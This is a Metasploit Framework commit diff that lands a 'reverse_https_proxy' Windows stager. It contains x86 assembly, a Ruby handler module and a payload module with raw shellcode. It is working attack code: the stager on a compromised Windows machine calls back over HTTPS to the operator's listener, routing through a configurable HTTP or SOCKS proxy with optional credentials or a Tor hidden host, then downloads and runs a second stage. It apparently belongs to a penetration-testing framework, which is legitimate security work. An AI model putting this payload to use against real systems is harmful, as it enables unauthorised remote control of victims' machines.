Land #2104 - reverse_https_proxy

bug/bundler_fix
sinn3r 2013-07-25 17:26:56 -05:00
commit 7b7603a5e7
4 changed files with 310 additions and 10 deletions

View File

@ -19,21 +19,21 @@ load_wininet:
call internetopen call internetopen
proxy_server_name: proxy_server_name:
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:55555",0x00 db "PROXYHOST:PORT",0x00
internetopen: internetopen:
mov ecx, esp pop ecx ; pointer to proxy_server_name
xor edi,edi xor edi,edi
push edi ; DWORD dwFlags push edi ; DWORD dwFlags
push edi ; LPCTSTR lpszProxyBypass push esp ; LPCTSTR lpszProxyBypass (empty)
push ecx ; LPCTSTR lpszProxyName push ecx ; LPCTSTR lpszProxyName
push byte 3 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3) push byte 3 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3)
push byte 0 ; NULL pointer push byte 0 ; NULL pointer
push esp ; LPCTSTR lpszAgent ("\x00") ; push esp ; LPCTSTR lpszAgent ("\x00") // doesn't seem to work with this
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp call ebp
jmp short dbl_get_server_host jmp dbl_get_server_host
internetconnect: internetconnect:
pop ebx ; Save the hostname pointer pop ebx ; Save the hostname pointer
@ -49,6 +49,37 @@ internetconnect:
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp call ebp
mov esi,eax ; safe hConnection
db "PROXY_AUTH_START" ; start marker for optional authentification, removed during payload creation
call set_proxy_username
proxy_username:
db "PROXY_USERNAME",0x00
set_proxy_username:
pop ecx ; Save the proxy username
push dword 15 ; DWORD dwBufferLength
push ecx ; LPVOID lpBuffer (username)
push byte 43 ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME)
push esi ; hConnection
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
call set_proxy_password
proxy_password:
db "PROXY_PASSWORD",0x00
set_proxy_password:
pop ecx ; Save the proxy password
push dword 15 ; DWORD dwBufferLength
push ecx ; LPVOID lpBuffer (password)
push byte 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)
push esi ; hConnection
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
db "PROXY_AUTH_STOP" ; stop marker for optional authentification, removed during payload creation
jmp get_server_uri jmp get_server_uri
httpopenrequest: httpopenrequest:
@ -68,7 +99,7 @@ httpopenrequest:
push edx ; version push edx ; version
push ecx ; url push ecx ; url
push edx ; method push edx ; method
push eax ; hConnection push esi ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp call ebp
mov esi, eax ; hHttpRequest mov esi, eax ; hHttpRequest

View File

@ -83,13 +83,21 @@ module ReverseHttp
# addresses. # addresses.
# #
def full_uri def full_uri
unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
lhost = datastore['HIDDENHOST']
else
lhost = datastore['LHOST'] lhost = datastore['LHOST']
end
if lhost.empty? or lhost == "0.0.0.0" or lhost == "::" if lhost.empty? or lhost == "0.0.0.0" or lhost == "::"
lhost = Rex::Socket.source_address lhost = Rex::Socket.source_address
end end
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
scheme = (ssl?) ? "https" : "http" scheme = (ssl?) ? "https" : "http"
unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/"
else
uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/" uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
end
uri uri
end end
@ -297,6 +305,42 @@ protected
print_status("Patched user-agent at offset #{i}...") print_status("Patched user-agent at offset #{i}...")
end end
# Activate a custom proxy
i = blob.index("METERPRETER_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
if i
if datastore['PROXYHOST']
if datastore['PROXYHOST'].to_s != ""
proxyhost = datastore['PROXYHOST'].to_s
proxyport = datastore['PROXYPORT'].to_s || "8080"
proxyinfo = proxyhost + ":" + proxyport
if proxyport == "80"
proxyinfo = proxyhost
end
if datastore['PROXY_TYPE'].to_s == 'HTTP'
proxyinfo = 'http://' + proxyinfo
else #socks
proxyinfo = 'socks=' + proxyinfo
end
proxyinfo << "\x00"
blob[i, proxyinfo.length] = proxyinfo
print_status("Activated custom proxy #{proxyinfo}, patch at offset #{i}...")
#Optional authentification
unless (datastore['PROXY_USERNAME'].nil? or datastore['PROXY_USERNAME'].empty?) or
(datastore['PROXY_PASSWORD'].nil? or datastore['PROXY_PASSWORD'].empty?) or
datastore['PROXY_TYPE'] == 'SOCKS'
proxy_username_loc = blob.index("METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
proxy_username = datastore['PROXY_USERNAME'] << "\x00"
blob[proxy_username_loc, proxy_username.length] = proxy_username
proxy_password_loc = blob.index("METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
proxy_password = datastore['PROXY_PASSWORD'] << "\x00"
blob[proxy_password_loc, proxy_password.length] = proxy_password
end
end
end
end
# Replace the transport string first (TRANSPORT_SOCKET_SSL) # Replace the transport string first (TRANSPORT_SOCKET_SSL)
i = blob.index("METERPRETER_TRANSPORT_SSL") i = blob.index("METERPRETER_TRANSPORT_SSL")
if i if i

View File

@ -0,0 +1,58 @@
# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/sync/ref'
require 'msf/core/handler/reverse_http'
module Msf
module Handler
###
#
# This handler implements the HTTP SSL tunneling interface.
#
###
module ReverseHttpsProxy
include Msf::Handler::ReverseHttp
#
# Returns the string representation of the handler type
#
def self.handler_type
return "reverse_https_proxy"
end
#
# Returns the connection-described general handler type, in this case
# 'tunnel'.
#
def self.general_handler_type
"tunnel"
end
#
# Initializes the HTTP SSL tunneling handler.
#
def initialize(info = {})
super
register_options(
[
OptString.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
], Msf::Handler::ReverseHttpsProxy)
end
end
end
end

View File

@ -0,0 +1,167 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/reverse_https_proxy'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Windows
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse HTTPS Stager with Support for Custom Proxy',
'Description' => 'Tunnel communication over HTTP using SSL, supports custom proxy',
'Author' => ['hdm','corelanc0d3r <peter.ve[at]corelan.be>', 'amaloteaux'],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseHttpsProxy,
'Convention' => 'sockedi https',
'Stager' =>
{
'Payload' =>
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xE8\x0F\x00\x00\x00\x50\x52\x4F\x58\x59\x48\x4F\x53\x54" +
"\x3A\x50\x4F\x52\x54\x00\x59\x31\xFF\x57\x54\x51\x6A\x03\x6A\x00" +
"\x68\x3A\x56\x79\xA7\xFF\xD5\xE9\xC4\x00\x00\x00\x5B\x31\xC9\x51" +
"\x51\x6A\x03\x51\x51\x68\x5C\x11\x00\x00\x53\x50\x68\x57\x89\x9F" +
"\xC6\xFF\xD5\x89\xC6\x50\x52\x4F\x58\x59\x5F\x41\x55\x54\x48\x5F" +
"\x53\x54\x41\x52\x54\xE8\x0F\x00\x00\x00\x50\x52\x4F\x58\x59\x5F" +
"\x55\x53\x45\x52\x4E\x41\x4D\x45\x00\x59\x6A\x0F\x51\x6A\x2B\x56" +
"\x68\x75\x46\x9E\x86\xFF\xD5\xE8\x0F\x00\x00\x00\x50\x52\x4F\x58" +
"\x59\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x00\x59\x6A\x0F\x51\x6A" +
"\x2C\x56\x68\x75\x46\x9E\x86\xFF\xD5\x50\x52\x4F\x58\x59\x5F\x41" +
"\x55\x54\x48\x5F\x53\x54\x4F\x50\xEB\x48\x59\x31\xD2\x52\x68\x00" +
"\x32\xA0\x84\x52\x52\x52\x51\x52\x56\x68\xEB\x55\x2E\x3B\xFF\xD5" +
"\x89\xC6\x6A\x10\x5B\x68\x80\x33\x00\x00\x89\xE0\x6A\x04\x50\x6A" +
"\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56" +
"\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xD5" +
"\xEB\x49\xE8\xB3\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0" +
"\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40" +
"\x00\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68" +
"\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74" +
"\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\xEC\xFE\xFF\xFF"
}
))
end
#
# Do not transmit the stage over the connection. We handle this via HTTPS
#
def stage_over_connection?
false
end
#
# Generate the first stage
#
def generate
p = super
i = p.index("/12345\x00")
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttpsProxy::URI_CHECKSUM_INITW) + "\x00"
p[i, u.length] = u
# patch proxy info
proxyhost = datastore['PROXYHOST'].to_s
proxyport = datastore['PROXYPORT'].to_s || "8080"
proxyinfo = proxyhost + ":" + proxyport
if proxyport == "80"
proxyinfo = proxyhost
end
if datastore['PROXY_TYPE'].to_s == 'HTTP'
proxyinfo = 'http://' + proxyinfo
else #socks
proxyinfo = 'socks=' + proxyinfo
end
proxyloc = p.index("PROXYHOST:PORT")
p = p.gsub("PROXYHOST:PORT",proxyinfo)
# patch the call
calloffset = proxyinfo.length
calloffset += 1
p[proxyloc-4] = [calloffset].pack('V')[0]
#Optional authentification
if (datastore['PROXY_USERNAME'].nil? or datastore['PROXY_USERNAME'].empty?) or
(datastore['PROXY_PASSWORD'].nil? or datastore['PROXY_PASSWORD'].empty?) or
datastore['PROXY_TYPE'] == 'SOCKS'
jmp_offset = p.index("PROXY_AUTH_STOP") + 15 - p.index("PROXY_AUTH_START")
#remove auth code
p = p.gsub(/PROXY_AUTH_START(.)*PROXY_AUTH_STOP/i, "")
else
username_size_diff = 14 - datastore['PROXY_USERNAME'].length
password_size_diff = 14 - datastore['PROXY_PASSWORD'].length
jmp_offset = 16 + #PROXY_AUTH_START length
15 + #PROXY_AUTH_STOP length
username_size_diff + # difference between datastore PROXY_USERNAME length and db "PROXY_USERNAME length"
password_size_diff # same with PROXY_PASSWORD
#patch call offset
username_loc = p.index("PROXY_USERNAME")
p[username_loc - 4, 4] = [15 - username_size_diff].pack("V")
password_loc = p.index("PROXY_PASSWORD")
p[password_loc - 4, 4] = [15 - password_size_diff].pack("V")
#remove markers & change login/pwd
p = p.gsub("PROXY_AUTH_START","")
p = p.gsub("PROXY_AUTH_STOP","")
p = p.gsub("PROXY_USERNAME", datastore['PROXY_USERNAME'])
p = p.gsub("PROXY_PASSWORD", datastore['PROXY_PASSWORD'])
end
#patch jmp dbl_get_server_host
jmphost_loc = p.index("\x68\x3a\x56\x79\xa7\xff\xd5") + 8 # push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) ; call ebp
p[jmphost_loc, 4] = [p[jmphost_loc, 4].unpack("V")[0] - jmp_offset].pack("V")
#patch call Internetopen
p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V")
# patch the LPORT
unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
lport = datastore['HIDDENPORT']
else
lport = datastore['LPORT']
end
lportloc = p.index("\x68\x5c\x11\x00\x00") # PUSH DWORD 4444
p[lportloc+1] = [lport.to_i].pack('V')[0]
p[lportloc+2] = [lport.to_i].pack('V')[1]
p[lportloc+3] = [lport.to_i].pack('V')[2]
p[lportloc+4] = [lport.to_i].pack('V')[3]
# append LHOST and return payload
unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
lhost = datastore['HIDDENHOST']
else
lhost = datastore['LHOST']
end
p + lhost.to_s + "\x00"
end
#
# Always wait at least 20 seconds for this payload (due to staging delays)
#
def wfs_delay
20
end
end